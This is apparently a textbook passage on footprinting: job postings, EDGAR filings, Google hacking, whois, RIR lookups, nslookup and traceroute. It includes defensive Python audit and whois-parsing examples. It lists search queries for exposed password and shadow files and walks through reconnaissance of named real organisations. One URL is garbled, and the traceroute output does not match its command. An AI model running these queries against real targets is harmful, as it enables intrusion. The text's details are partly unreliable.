FIGURE 5-3 Wayback Machine results. (Screenshot of the archived snapshot dates, grouped by year, returned for one company's site; the image itself is not reproduced here.)

Of course, the Internet Archive is only one source from which valuable information can be gleaned about an intended target; another valuable source is job postings. Consider that the job postings a company places on the corporate Web site or on job boards can give valuable clues into what the infrastructure they use looks like. IT should take note of the skills being requested when examining job postings, paying special attention to the skills section. For example, consider the following posting:

Expertise Required:

• Advanced knowledge of Microsoft XP, 7, Server 2003, and products such as Microsoft Access, Microsoft SQL Server, Microsoft IIS, Visual Basic
• Proficient in Excel, Word, and PowerPoint 2007
• Relevant experience/knowledge of Cisco PIX, Checkpoint Firewall helpful but not necessary
• Virtual Machine (VMware), SAP, and other data-gathering systems

Although this is only a snippet of a larger job posting, it still provides insight into what the company happens to be using. Think for a moment how an attacker can make use of the information the company provided. As an example, the attacker could use the information to fine-tune a later attack by doing some research along these lines:

• Search for vulnerabilities in the discovered products
• Scan for application-specific configuration issues
• Locate product-specific defects


NOTE

When a company posts a job on a corporate site or a job posting site such as dice.com
or monster.com, care should be taken to sanitize the posting. A company that is thinking
ahead may either choose to be less specific on skills or remove information that easily
identifies the company in question. Sanitizing seeks to clean up or strip out sensitive
information that may be too sensitive or too revealing.

If the attacker can successfully use any of these attacks, it is
a simple matter to access the target's network and do further
harm. On the other hand, if the attacker finds that these vulner-
abilities are patched, the posting still provides information
on other software in use and insight into the environment.

Another gem of information that can be useful in job
postings is job location. When browsing a job posting, the
location information, when browsed in conjunction with
skills, can yield insight into potential activities at a location.
When browsing job postings, the appearance of unusual skills
at a specific location can be an indicator of activities such as
those associated with research and development. An attacker
could use the information to target specific locations that
are more likely to contain assets of value.

Discovering Financial Information

It is not surprising that an ever-increasing number of attacks are financially
motivated in nature. Criminals have discovered that technology can be a new and
very effective way of committing old scams on a new medium. For example, consider
Albert Gonzalez, the hacker convicted of the TJ Maxx hacking attack. According
to http://www.informationweek.com, Mr. Gonzalez did not pick his targets at random.

FIGURE 5-4 Cisco EDGAR 10-Q.

The Value of Footprinting

How important is footprinting? According to the Information Security Forum (ISF), profit-driven
attacks have largely replaced those of the lone wolf hacker. These new attackers rely on careful
footprinting to determine and select suitable targets. Groups of organized criminal hackers
have even been known to place bogus employees within organizations to provide inside
knowledge that can be used to more effectively carry out an attack.

This new mode of attack is designed to steal valuable and sensitive information or customer
data for financial gain and profit. Although not unheard of, such crimes are rarely carried out
by one person; these attacks are typically the work of criminal networks that bring together
specialist skills and expertise.

Targets were footprinted prior to being attacked: the footprinting process was specifically
used to determine whether a targeted company made enough money to merit an attack.
TJ Maxx is only one of the ever-increasing numbers of victims of cybercrime, numbers
that are expected to increase as criminals adopt new methods and technologies.

It is no surprise that the criminal element is quite often attracted to the prospect of
monetary gain, and cybercrime is no exception. When a criminal is choosing a company
to attack based on whether that company makes enough money, items such as publicly
available financial records can prove vital. In the United States, getting information on
the financial health of companies is easy because financial records on publicly traded
companies are available for review. These financial records are easily accessible through
the Securities and Exchange Commission (SEC) Web site at http://www.sec.gov. On the Web
site, it is possible to review the Electronic Data Gathering, Analysis, and Retrieval system
(EDGAR) database, which contains all sorts of financial information (some updated daily).
All foreign and domestic companies that are publicly traded are legally required to file
registration statements, periodic reports, and other forms electronically through EDGAR,
all of which can be browsed by the public. Of particular interest in the EDGAR database
are the items known as the 10-Qs and 10-Ks. These items are quarterly and yearly reports
that contain the names, addresses, financial data, and information about acquired or
divested industries. For example, a search of the EDGAR database for information about
Cisco returns the list of records shown in Figure 5-4.

Closer examination of these records indicates where the company is based, detailed
financial information, and the names of the principals, such as the president and
members of the board. EDGAR is not the only source of this information, however;
other sites provide similar types of information, including the following:

• Hoovers — http://www.hoovers.com/

• Bloomberg — http://www.bloomberg.com/


One of the major reasons why Google hacking is so effective is the large amount of information
any given company generates. Statistically, the average company tends to double the amount
of data it possesses every 18 months during normal operations. If a company were to take
only a small fraction of that information and make it accessible from the Internet, it would
be potentially releasing a large amount of information into the world around it.

The previous two methods demonstrated simple but powerful tools that can be used to
gain information about a target. The methods both showed how they can be used in
unintended and new ways to gain information. One more tool that can be used in ways
never really intended is Google. Google contains a tremendous amount of information of
all types just waiting to be searched and uncovered. In a process known as Google hacking,
the goal is to locate useful information using techniques already provided by the search
engine in new ways. If you can construct the proper queries, Google search results can
provide a hacker useful data about a targeted company. Google is only one search engine;
other search engines, such as Yahoo and Bing, are also vulnerable to being used and
abused in this way.

Why is Google hacking effective? Quite simply it is because Google indexes vast
amounts of information in untold numbers of formats. Google obviously can index Web
pages like any search engine. But Google can also index images, videos, discussion group
postings, and all sorts of file types such as .pdf, .ppt and more. All the information that
Google, or any search engine, gathers is held in large databases that are designed to be
searchable; you only need to know how to look.

There are numerous resources about the process of Google hacking, but one of the best
is Johnny Long's Google Hacking Database (GHDB) at http://www.hackersforcharity.org/
ghdb/. This site offers insight into some of the ways an attacker can easily find exploitable
targets and sensitive data by using Google's built-in functionality. An example of what
is found at the Web site is seen in Figure 5-5.

The GHDB is merely a database of queries that identifies sensitive data and content
that potentially may be of a sensitive nature. Some of the items an attacker can find
are available using the following techniques:

• Error messages that contain too much information
• Files containing passwords
• Sensitive directories
• Pages containing logon portals
• Pages containing network or vulnerability data


FIGURE 5-5 Google Hacking Database.

What makes this possible is the way in which information is indexed by a search engine.
Specific commands such as intitle instruct Google to search for a term within the title
of a document. Some examples of intitle search strings are shown here:

• intitle:"index of" .bash_history
• intitle:"index of" etc/shadow
• intitle:"index of" finances.xls
• intitle:"index.of" htpasswd
• intitle:"index of" inurl:maillog

The keyword "intitle:" directs Google to search for and return pages which contain the
words listed after the intitle: keyword. For example, intitle:"index of" finance.xls will
return pages that contain files of the name finance.xls. Once these results are returned,
the attacker can browse the results looking for those that contain sensitive or restricted
information that may reveal additional details about the organization.

Another popular search parameter is filetype. This query allows the search to look for
a particular term only within a specific filetype. A few examples of the use of this
search string are as follows:

• filetype:bak inurl:"htaccess|passwd|shadow|htusers"
• filetype:conf slapd.conf
• filetype:ctt "msn"
• filetype:mdb inurl:"account|users|admin|administrators|passwd|password"
• filetype:xls inurl:"email.xls"

The keyword "filetype:" instructs Google to return files that have specific extensions.
For example, filetype:doc or filetype:xls will return all the Word or Excel documents.

To better understand the actual mechanics of this type of attack, a closer examination
is necessary. With this type of attack an attacker will need some knowledge ahead of
time, such as the information gathered from a job posting regarding applications.
The attacker can then determine that a company is hosting a Web server and further
details such as the type and version (for example, Microsoft IIS 6.0). An attacker can
then use this knowledge to perform a search to uncover whether the company is actually
running the Web server version in question. For example, the attacker may have chosen
to attack Cisco and as such will need to locate the Web servers that are running IIS 6.0
to move their attack to the next phase. Using Google to find Web servers that are running
Microsoft IIS 6.0 can be accomplished with a simple Google query such as
intitle:index.of "Microsoft-IIS/6.0 Server at" on the Google search page. The results
of this search are shown in Figure 5-6. Notice that more than 2,000 hits were returned.

FIGURE 5-6 Google Hacking Database search results.

A final search query that can prove invaluable is the Google keyword inurl. The inurl
string is used to search within a site's uniform resource locator (URL). This is very
useful if some knowledge of URL strings, or of the standard URL strings used by different
types of applications and systems, is possessed. Some common inurl searches include
the following:

• inurl:admin filetype:db
• inurl:admin inurl:backup intitle:index.of
• inurl:"auth_user_file.txt"
• inurl:"/axs/ax-admin.pl" -script
• inurl:"/cricket/grapher.cgi"

The keyword "inurl:" commands Google to return pages which include specific words or
characters in the URL. For example, the search request inurl:hyrule will produce pages
that have the word "hyrule" in the URL.
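A defender can turn the same operators around and audit their own document root before a search engine does. The following Python script is an added example, not part of the book: it walks a directory tree, flags file names matching the patterns the intitle:, filetype: and inurl: queries above look for, and flags directories that lack an index file (the ones an "Index of" listing would expose); the pattern list and the sample directory layout are constructed for illustration.

```python
"""Self-audit of a Web document root for the kinds of exposures that
intitle:/filetype:/inurl: queries surface (added example, not the book's)."""
import os
import re
import tempfile

# Name patterns derived from the queries discussed above; the list is
# illustrative, not exhaustive.
SENSITIVE_NAME_PATTERNS = [
    (re.compile(r"^\.bash_history$"), "shell history file"),
    (re.compile(r"^(shadow|passwd)$"), "Unix account file"),
    (re.compile(r"^\.?(htpasswd|htaccess|htusers)$"), "Apache auth/config file"),
    (re.compile(r"^auth_user_file\.txt$"), "application user list"),
    (re.compile(r"^slapd\.conf$"), "LDAP server configuration"),
    (re.compile(r"^maillog"), "mail server log"),
    (re.compile(r"\.(bak|old|orig|swp)$", re.IGNORECASE), "backup or editor copy"),
    (re.compile(r"\.mdb$", re.IGNORECASE), "Access database"),
    (re.compile(r"(finance|email|password|passwd|account).*\.xls$", re.IGNORECASE),
     "spreadsheet with a sensitive name"),
]

# Without one of these, a directory with autoindex enabled is served as an
# "Index of /..." listing, which is exactly what intitle:"index of" finds.
INDEX_FILES = {"index.html", "index.htm", "index.php", "default.htm", "default.aspx"}


def audit_webroot(root):
    """Walk `root` and return sorted (relative path, reason) findings."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        rel_dir = "" if rel_dir == "." else rel_dir
        if not INDEX_FILES & {name.lower() for name in filenames}:
            findings.append((rel_dir or "/",
                             "no index file: listing would be served if autoindex is on"))
        for name in filenames:
            for pattern, reason in SENSITIVE_NAME_PATTERNS:
                if pattern.search(name):
                    findings.append((os.path.join(rel_dir, name), reason))
                    break  # one reason per file is enough
    return sorted(findings)


def build_sample_webroot():
    """Create a constructed document root in a temp directory for the demo."""
    root = tempfile.mkdtemp(prefix="webroot-")
    layout = {
        "index.html": "<html>welcome</html>",
        "reports/index.html": "",
        "reports/finance.xls": "constructed sample",
        "old/config.php.bak": "constructed sample",
        "admin/index.php": "",
        "admin/.htpasswd": "constructed sample",
        "docs/readme.txt": "nothing sensitive here",
    }
    for rel, content in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as handle:
            handle.write(content)
    return root


if __name__ == "__main__":
    for path, reason in audit_webroot(build_sample_webroot()):
        print(f"{path}: {reason}")
```

Run it against a real document root to see which of these findings a search engine could already have indexed.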
These search queries and variations are very powerful information-gathering mechanisms
that can reveal information that may not be so obvious or accessible normally. Gaining
a careful understanding of each search term and keyword can allow a potential attacker
to gain information about a target that may otherwise be out of view. The security
professional who wants to gain additional insight into how footprinting using Google
hacking works should experiment with each term and what it reveals. Knowing how they
are used by attackers can help prevent the wrong information ending up in a Web search
of your organization through the careful planning and securing of data.

Exploring Domain Information Leakage

A reality of developing security for any public organization is the fact that some
information is difficult or impossible to hide. A public company that wants to attract
customers must walk a fine line because some information by necessity will have to be
made public while other information can be kept secret. An example of information that
should be kept secret by any company is domain information, or the information that is
associated with the registration of an Internet domain. Currently many tools are available
that can be used for obtaining types of basic information, including these:

• Whois
• Nslookup
• Internet Assigned Numbers Authority (IANA) and Regional Internet Registries (RIRs)
to find the range of Internet protocol (IP) addresses
• Traceroute to determine the location of the network

Each of these tools can provide valuable information pulled from domain registration
information.

Manual Registrar Query

The Internet Corporation for Assigned Names and Numbers (ICANN) is the primary body
charged with management of IP address space allocation, protocol parameter assignment,
and domain name system management.
Global domain name management is delegated to the Internet Assigned Numbers Authority
(IANA). IANA is responsible for the global coordination of the Domain Name System (DNS)
Root, IP addressing, and other Internet protocol resources.

FIGURE 5-7 Root Zone Database.

FIGURE 5-8 EDU registration services.

When the network range is determined manually, the best resource available to make
this happen is the IANA Web site at the Root Zone Database page located at http://www
.iana.org/domains/root/db/. The Root Zone Database represents the delegation details of top-
level domains (TLDs), including domains such as .com and country-code TLDs such as .us.
As the manager of the DNS root zone, IANA is responsible for coordinating these delegations
in accordance with its stated policies and procedures. The Web site can be seen in Figure 5-7.

To fully grasp the process of uncovering a domain name and its associated information,
it is best to examine the process step by step. In this example, a search for http://www.smu
.edu will be performed. Of course, the target in this scenario has already been set, but in
the real process the target would be the entity to be attacked. After the target has been
identified (in this case, http://www.smu.edu), move through the list until EDU is located;
then click that page. The EDU Web page is shown in Figure 5-8.

At this point, the registration services for the .edu domain are handled by http://www
.educause.edu/edudomain. Once the registrant for .edu domains has been identified, it is
now possible to use the educause Web site at http://whois.educause.net/ and enter a query
for http://www.smu.edu. The results of this query are shown in Figure 5-9.

Because organization and planning are essential skills for security professionals, make
note of the information uncovered for later use. While the organization method that each
individual uses is unique, consider an organization strategy similar to the matrix located
in Table 5-1.

TABLE 5-1 Initial whois findings.

                                   NETWORK RANGE    DNS SERVER       POINT OF CONTACT
http://www.smu.edu 129.119.64.10   (not yet known)  129.119.64.10    Bruce Meikle

FIGURE 5-9 SMU query.

Note that in a matter of a few clicks, it was possible to obtain very detailed information
about the target such as the IP address of the Web server, DNS server IP address, location,
point of contact, and more. In fact, of the information gathered at this point the only
thing that is noticeably absent is the actual information about the network range.

To obtain the network range requires the attacker to visit at least one or more of the
Regional Internet Registries (RIRs), which are responsible for management, distribution,
and registration of public IP addresses within their respective assigned regions. Currently
there are five primary RIRs (see Table 5-2).

Because RIRs are important to the process of information gathering and hacking,
it is important to define the process of using an RIR in the context of http://www.smu.edu.
When searching for information on the target, it serves some purpose to consider location;
earlier research indicated that the host was located in Dallas, Texas. With this piece
of information in hand, a query can be run using the ARIN site to obtain still more
information about the domain. The http://www.arin.net site is shown in Figure 5-10.


TABLE 5-2 Regional Internet registries.

REGIONAL INTERNET REGISTRY   REGION OF CONTROL
ARIN                         North and South America
APNIC                        Asia and Pacific
RIPE                         Europe, Middle East, and parts of Africa
LACNIC                       Latin America and the Caribbean
AfriNIC                      Africa

FIGURE 5-10 ARIN site.

Located in the top-right corner of the Web page is a search box labeled "search whois."
In this search box, enter the IP address of http://www.smu.edu that was recorded earlier
and is also noted in Table 5-1 for reference. The results of this search are shown
in Figure 5-11.

You can see that the network range is 129.119.0.0-129.119.255.255. With this
information, the last piece of the network range puzzle is in place, and a clear picture
of the address on the network is built. Network range data provides a critical piece of
information for an attacker because it confirms that addresses between 129.119.0.0-
129.119.255.255 all belong to http://www.smu.edu (these addresses will be examined
in the next step of the process). With this last piece of information included, the table
should now resemble what is shown in Table 5-3.
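The ARIN record's NetRange line can be turned into CIDR notation and used to check which hosts fall inside the registered block. The Python below is an added example, not the book's: it parses Key: Value whois output into fields, summarizes a start-end range into CIDR blocks (including ranges that do not align to a single block), and tests an address against the range; the sample record is constructed with placeholder name servers and contact, keeping only the values the chapter states.

```python
"""Parse RIR (ARIN-style) whois output and derive CIDR blocks from NetRange.
Added example, not code from the book."""
import ipaddress
import re

# Constructed sample in the Key: Value layout of an ARIN record. Only the
# organization, city/state, and network range are values the chapter gives;
# the name servers and abuse contact are placeholders.
SAMPLE_ARIN_WHOIS = """\
OrgName:        Southern Methodist University
City:           Dallas
StateProv:      TX
Country:        US
NetRange:       129.119.0.0 - 129.119.255.255
NetType:        Direct Assignment
NameServer:     ns-placeholder-1.example.edu
NameServer:     ns-placeholder-2.example.edu
OrgAbuseEmail:  abuse@example.edu
"""

FIELD_RE = re.compile(r"^([A-Za-z][\w-]*):\s*(.*)$")


def parse_whois(text):
    """Return {field: [values]}; repeated fields such as NameServer accumulate."""
    record = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):   # ARIN prefixes comment lines with '#'
            continue
        match = FIELD_RE.match(line)
        if match:
            record.setdefault(match.group(1), []).append(match.group(2).strip())
    return record


def net_range_to_cidrs(net_range):
    """'129.119.0.0 - 129.119.255.255' -> ['129.119.0.0/16']. A range that is
    not aligned to one block comes back as several blocks."""
    start, end = (part.strip() for part in net_range.split("-", 1))
    first, last = ipaddress.ip_address(start), ipaddress.ip_address(end)
    if last < first:
        raise ValueError(f"range end precedes start: {net_range}")
    return [str(net) for net in ipaddress.summarize_address_range(first, last)]


def address_in_range(ip, net_range):
    """True when `ip` lies inside the registered range, e.g. to confirm that a
    host you believe is yours really is, or that a stray host is not."""
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(c) for c in net_range_to_cidrs(net_range))


def summarize(text):
    """Collapse a whois record into the fields the chapter's tracking matrix keeps."""
    record = parse_whois(text)
    net_range = record["NetRange"][0]
    return {
        "organization": record.get("OrgName", [""])[0],
        "location": ", ".join(record.get(k, [""])[0] for k in ("City", "StateProv", "Country")),
        "net_range": net_range,
        "cidrs": net_range_to_cidrs(net_range),
        "name_servers": record.get("NameServer", []),
        "abuse_contact": record.get("OrgAbuseEmail", [""])[0],
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_ARIN_WHOIS).items():
        print(f"{key}: {value}")
    print("129.119.64.10 in range:",
          address_in_range("129.119.64.10", "129.119.0.0 - 129.119.255.255"))
```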

FIGURE 5-11 ARIN results.

TABLE 5-3 Final whois findings.

                                   NETWORK RANGE                  DNS SERVERS      POINT OF CONTACT
http://www.smu.edu 129.119.64.10   129.119.0.0-129.119.255.255    129.119.64.10    Bruce Meikle

Automatic Registrar Query

The manual method of obtaining network range information is effective, but it does have
the drawback of taking a significant amount of time. You can speed up the process using
automated methods to gather this information faster than can be done manually. Several
Web sites are dedicated to providing this information in a consolidated view. Numerous
Web sites are also dedicated to providing network range information automatically.

FIGURE 5-12 Domaintools name query.

Some of the more common or popular destinations for searches of this type include
the following:

http://www.samspade.org
h t fp: ii iv ww, t ienvhois. com
http://www.allwhois.com
http://geektools.com
http://www.all-nettools.com
http://www.smartwhois.com
http://www.dnsstuff.com
http://whois.domaintools.com

A point to remember is that no matter what tool the professional prefers, the goal is to
obtain registrar information. As an example, Figure 5-12 shows the results of http://
whois.domaintools.com when http://www.smu.edu was queried for information.

Underlying all these tools is a tool known as whois, which is software designed to query
the databases that hold registration information. Whois is a utility that has been specifically
designed to interrogate the Internet domain name administration system and return the
domain ownership, address, location, phone number, and other details about a specified


domain name. The accessibility of this tool depends on the operating system in use.
For Linux users, the tool is just a command prompt away; Windows users have to locate
a Windows-compatible version and download it or use a Web site that provides the service.

Whois

The Whois protocol was designed to query databases to look up and identify the registrant
of a domain name. Whois information contains the name, address, and phone number
of the administrative, billing, and technical contacts of the domain name. It is primarily
used to verify whether a domain name is available or whether it has been registered.
The following is an example of the whois info for cisco.com:

Registrant:
Cisco Technology Inc.
170 W. Tasman Drive
San Jose, CA 95134
US

Domain Name: CISCO.COM

Info Sec
170 W. Tasman Drive
San Jose, CA 95134
408-527-3842 fax: 408-526-4575

Technical Contact:
Network Services
170 W. Tasman Drive
San Jose, CA 95134
US
408-527-9223 fax: 408-526-7373

Record expires on 15-May-2011.
Record created on 14-May-1987.

Domain servers in listed order:
NS1.CISCO.COM 128.107.241.185
NS2.CISCO.COM 64.102.255.44

NOTE

Whois has also been used by law enforcement to gain information useful in prosecuting
criminal infringement.

By looking at this example it is possible to gain some information about the domain name
and the department that is responsible for managing it which, in this case, is the Infosec
team. Additionally, you will note that we have phone numbers and DNS info for the
domain as well, not to mention a physical address that we can look up using Google Earth.


Nslookup

Nslookup is a program to query Internet domain name servers. Both UNIX and
Windows come with an Nslookup client. If Nslookup is given an IP address or a fully
qualified domain name (FQDN), it will look up and show the corresponding IP address.
Nslookup can be used to do the following:

• Find additional IP addresses if authoritative DNS is known from Whois
• List the MX (mail) server for a specific range of IP addresses

Extracting Information with NSLOOKUP:

nslookup
set type=mx
cisco.com
Server: x.x.x.x

cisco.com mail exchanger = 10 smtp5.cisco.com.
cisco.com mail exchanger = 10 smtp4.cisco.com.
cisco.com mail exchanger = 10 smtp1.cisco.com.
cisco.com mail exchanger = 10 smtp2.cisco.com.
Authoritative answers can be found from:
cisco.com nameserver = ns1.cisco.com.
cisco.com nameserver = ns2.cisco.com.
cisco.com nameserver = ns5.cisco.com.
cisco.com nameserver = ns4.cisco.com.
ns1.cisco.com internet address = 216.239.32.10
ns2.cisco.com internet address = 216.239.34.10
ns4.cisco.com internet address = 216.239.38.10

Looking at these results you can see several pieces of information that would be useful,
including the addresses of nameservers and mail exchangers. The nameservers represent
the systems used to host DNS while the mail exchangers represent the addresses of servers
used to process mail for the domain. The addresses should be recorded for later scanning
and vulnerability checking.

Internet Assigned Numbers Authority (IANA)

According to http://www.iana.org, "The Internet Assigned Numbers Authority (IANA) is
responsible for the global coordination of the DNS root, IP addressing, and other Internet
protocol resources." Based on this information, IANA is a good starting point to learn more


DNS 101

Nslookup works with and queries the DNS, which is a hierarchical naming system for servers,
computers, and other resources connected to the Internet. This system associates information such as
IP address to the name of the resource itself. Once this association is present, it is possible to translate
names of systems meaningful to humans into the IP addresses associated with networking equipment
for the purpose of locating these devices. DNS can be thought of much in the same way as looking
up phone numbers or names in a phonebook. First, a phonebook system is hierarchical with different
phonebooks for different regions and within those phonebooks, different area codes. Second,
in the phonebook you have names and the phone numbers associated with them, along with other
information such as physical addresses, much like DNS. When looking up an individual you simply
look up their name and see what their phone number is and call them. In DNS this would be called
a forward lookup. You also can call Information and give a number and they can do a reverse lookup
where they take the phone number and look up the name associated with it.

about domain ownership and to determine registration information. A good place to start is at
the Root Zone Database page, which lists all top-level domains, including .com, .edu, .org, and
so on. It also shows two-character country codes. Refer to the example shown in Figure 5-7.

For example, for a quick look at information on an .edu domain such as Villanova
University, you could start at http://www.iana.org/domains/root/db/edu.html. The top-level
domain for .edu sites is http://www.educause.edu/edudomain (and the whois server: whois
.educause.net). The results of this search can be seen in Figure 5-13.

FIGURE 5-13

EDU whois search result.

PART 2 A Technical Overview of Hacking

The same type of search can be performed against a .com domain such as http://www
.hackthestack.com. The results of this search are shown here:

Domain Name: HACKTHESTACK.COM
Reseller: DomainsRus
Created on: 27 Jun 2006 11:15:37 EST
Expires on: 27 Jun 2018 11:15:47 EST
Record last updated on: 11 May 2009 07:18:10 EST
Status: ACTIVE
Owner, Administrative Contact, Technical Contact, Billing Contact:
Superior Solutions Inc
PO Box 1722
Freeport, TX 77542
United States
Phone: +979.8765309
Email:
Domain servers in listed order:
NS1.PLANETDOMAIN.COM
NS2.PLANETDOMAIN.COM

Notice that these results also include a physical address along with all the other domain
information. It would be possible to take the physical address provided and enter it into
any of the commonly available mapping tools and gain information on the proximity
of this address to the actual company. Now that the domain administrator is known,
the next logical step in the process could be to determine a valid network range.

Determining a Network Range

One of the missions of the IANA is to delegate Internet resources to RIRs. The RIRs
further delegate resources as needed to customers, who include Internet service providers
(ISPs) and end-user organizations. The RIRs are organizations responsible for control of
IPv4 and IPv6 addresses within specific regions of the world. The five RIRs are as follows:

• American Registry for Internet Numbers (ARIN) — North America and parts of the Caribbean
• RIPE Network Coordination Centre (RIPE NCC) — Europe, the Middle East, and Central Asia
• Asia-Pacific Network Information Centre (APNIC) — Asia and the Pacific region
• Latin American and Caribbean Internet Addresses Registry (LACNIC) — Latin America
and parts of the Caribbean region
• African Network Information Centre (AfriNIC) — Africa

Per standards, each RIR must maintain point-of-contact (POC) information and IP
address assignment. As an example, if the IP address 202.131.95.30 corresponding to
http://www.hackthestack.com is entered, the following response is returned from ARIN:

OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU
ReferralServer: whois://whois.apnic.net
NetRange: 202.0.0.0 - 203.255.255.255
CIDR: 202.0.0.0/7
NetName: APNIC-CIDR-BLK
NetHandle: NET-202-0-0-0-1

Take note of the range of 202.0.0.0 to 203.255.255.255. This is not the target's own
network: ARIN is answering with a referral, showing that the entire 202.0.0.0/7 block
(about 33 million addresses shared by many organizations) is delegated to APNIC. To find
the allocation that actually covers the network hosting the http://www.hackthestack.com
Web site, repeat the query against the ReferralServer, whois.apnic.net, and record only
the range that registry returns.
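To work with a record like the one above rather than reading it by eye, here is an added example in Python (not the textbook's own code). It parses the Key: value layout the RIRs return, reconciles the NetRange and CIDR lines, checks whether a given address falls inside the block, converts the range to CIDR blocks with their netmasks for a scanner, and pulls out the ReferralServer that says the query must be repeated elsewhere. SAMPLE_RECORD is a cleaned-up copy of the ARIN response shown above; the function names and the extra inputs used in the usage section are assumptions.

```python
"""Parse an RIR whois network record and decide what it actually tells you.

Added example for this page, not the textbook's own code.  SAMPLE_RECORD is a
cleaned-up copy of the ARIN response shown above; everything else (function
names, the extra inputs used in the usage section) is an assumption.
"""
import ipaddress
import re

SAMPLE_RECORD = """\
OrgName:        Asia Pacific Network Information Centre
OrgID:          APNIC
City:           Milton
StateProv:      QLD
PostalCode:     4064
Country:        AU
ReferralServer: whois://whois.apnic.net
NetRange:       202.0.0.0 - 203.255.255.255
CIDR:           202.0.0.0/7
NetName:        APNIC-CIDR-BLK
NetHandle:      NET-202-0-0-0-1
"""

# RIR records are "Key: value" lines; anything else is ignored.
FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*):\s*(.*?)\s*$")


def parse_record(text):
    """Return a dict of field name -> value (a repeated key keeps its last value)."""
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def net_range(fields):
    """Return (first, last) IPv4Address covered by the record.

    Uses NetRange when present and CIDR otherwise.  If both are present they
    must agree; a mismatch usually means the record was copied incorrectly.
    """
    first = last = None
    if "NetRange" in fields:
        lo, hi = (p.strip() for p in fields["NetRange"].split("-"))
        first, last = ipaddress.ip_address(lo), ipaddress.ip_address(hi)
    if "CIDR" in fields:
        # A record may list several comma-separated blocks; cover them all.
        blocks = [ipaddress.ip_network(b.strip(), strict=False)
                  for b in fields["CIDR"].split(",")]
        c_first = min(b.network_address for b in blocks)
        c_last = max(b.broadcast_address for b in blocks)
        if first is None:
            first, last = c_first, c_last
        elif (first, last) != (c_first, c_last):
            raise ValueError("NetRange %s-%s disagrees with CIDR %s"
                             % (first, last, fields["CIDR"]))
    if first is None:
        raise ValueError("record has neither NetRange nor CIDR")
    return first, last


def contains(fields, ip):
    """True if the address lies inside the record's range."""
    first, last = net_range(fields)
    return first <= ipaddress.ip_address(ip) <= last


def to_cidrs(fields):
    """Express the range as CIDR blocks with their netmasks, ready for a scanner."""
    first, last = net_range(fields)
    return [(str(n), str(n.netmask))
            for n in ipaddress.summarize_address_range(first, last)]


def referral(fields):
    """Whois server to query next, or None if this registry holds the allocation.

    A ReferralServer means the address is merely inside a block delegated to
    another RIR; the target's real allocation has to be looked up there.
    """
    server = fields.get("ReferralServer")
    return server.replace("whois://", "") if server else None


if __name__ == "__main__":
    rec = parse_record(SAMPLE_RECORD)
    first, last = net_range(rec)
    print("range: %s - %s (%d addresses)" % (first, last, int(last) - int(first) + 1))
    print("blocks:", to_cidrs(rec))
    print("202.131.95.30 inside:", contains(rec, "202.131.95.30"))
    print("query next:", referral(rec))
```

Run against the record above, referral() returns whois.apnic.net and to_cidrs() reports a single /7 with netmask 254.0.0.0, which is the signal that the range is a registry delegation, not a scannable target. The mismatch check in net_range() exists because hand-copied records (as in a report or a note like the one in this chapter) are frequently mangled.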

Many other Web sites can be used to mine this same type of data. Some of them
include the following:

• http://www.all-nettools.com
• http://www.smartwhois.com
• http://www.allwhois.com
• http://www.dnsstuff.com
• http://www.samspade.org

The next section shows how a hacker can determine the true location of the domain.

Traceroute

Traceroute is a software program used to determine the path a data packet traverses to
get to a specific IP address. Traceroute, which is one of the easiest ways to identify the
path to a targeted Web site, is available on both UNIX and Windows operating systems.
In Windows operating systems, the command is known as tracert and is run from the
command prompt. Regardless of the name, the program displays the list of routers on a
path to a network destination by using Time to Live (TTL) time-outs and Internet Control
Message Protocol (ICMP) error messages. The two implementations differ in the probes
they send: Windows tracert sends ICMP Echo Requests, while UNIX traceroute by default
sends UDP datagrams to high-numbered ports, so a firewall that blocks one kind of probe
may still let the other through.

C:\>tracert www.cisco.com

Tracing route to arin.net [202.131.95.30]

  1     1 ms     1 ms     1 ms  192.168.123.254
  2    12 ms    15 ms    11 ms  adsl-69-151-223-254.dsl.hstntx.swbell.net [69.151.223.254]
  3    12 ms    12 ms    12 ms  151.164.244.193
  4    11 ms    11 ms    11 ms  bb1-g14-0.hstntx.sbcglobal.net [151.164.92.204]
  5    48 ms    51 ms    48 ms  151.164.98.61
  6    46 ms    48 ms    48 ms  gi1-1.wil4.net.reach.com [206.223.123.11]
  7    49 ms    50 ms    48 ms  i-0-0-0.wil-core02.bi.reach.com [202.84.251.233]
  8   196 ms   195 ms   196 ms  i-15-0.sydp-core02.bx.reach.com [202.84.140.37]
  9   204 ms   202 ms   203 ms  unknown.net.reach.com [134.159.131.110]
 10   197 ms   197 ms   200 ms  ssg550-1-r1-1.network.netregistry.net [202.124.240.66]
 11   200 ms   227 ms   197 ms  forward.planetdomain.com [202.131.95.30]

Analyzing these results, it is possible to get a better look at what traceroute is providing.
Traceroute functions by sending out a packet to a destination with the TTL set to 1.
When the packet encounters the first router in the path to the destination, the router
decrements the TTL by 1, in this case setting the value to 0, which results in the packet
being discarded and an ICMP Time Exceeded message being sent back to the original sender.
This response is recorded and a new packet is sent out with a TTL of 2. This packet will
make it through the first router, then will stop at the next router in the path. This
second router then sends an error message back to the originating host much like the first
router. Traceroute continues to do this over and over until a packet finally reaches the
target host, or until a host is determined to be unreachable. In the process, traceroute
records the time it took for each packet to travel round trip to each router; by default
three probes are sent for each TTL value, which is why every hop above shows three times.
It is through this process that a map can be drawn of the path to the final destination.

In the above results you can literally see the IP address, name, and the time it took
to reach each host and return a response, giving a clear picture of the path to connect
to the remote host and the time to do so. The router names are informative in themselves:
hstntx and sydp suggest a Houston, Texas, hop and a Sydney hop, and the jump from roughly
50 ms at hop 7 to nearly 200 ms at hop 8 marks the long-haul link between them.

The next-to-last hop before the Web site will often be the organization’s edge device,
such as a router or firewall. In the trace above that is hop 10, and its name,
ssg550-1-r1-1, suggests a Juniper SSG 550 security gateway. However, you cannot always
rely on this information because security-minded organizations tend to limit the ability
to perform traceroutes into their networks, in which case the final hops show only
time-outs (asterisks) and the last visible hop is where filtering starts, not the edge.
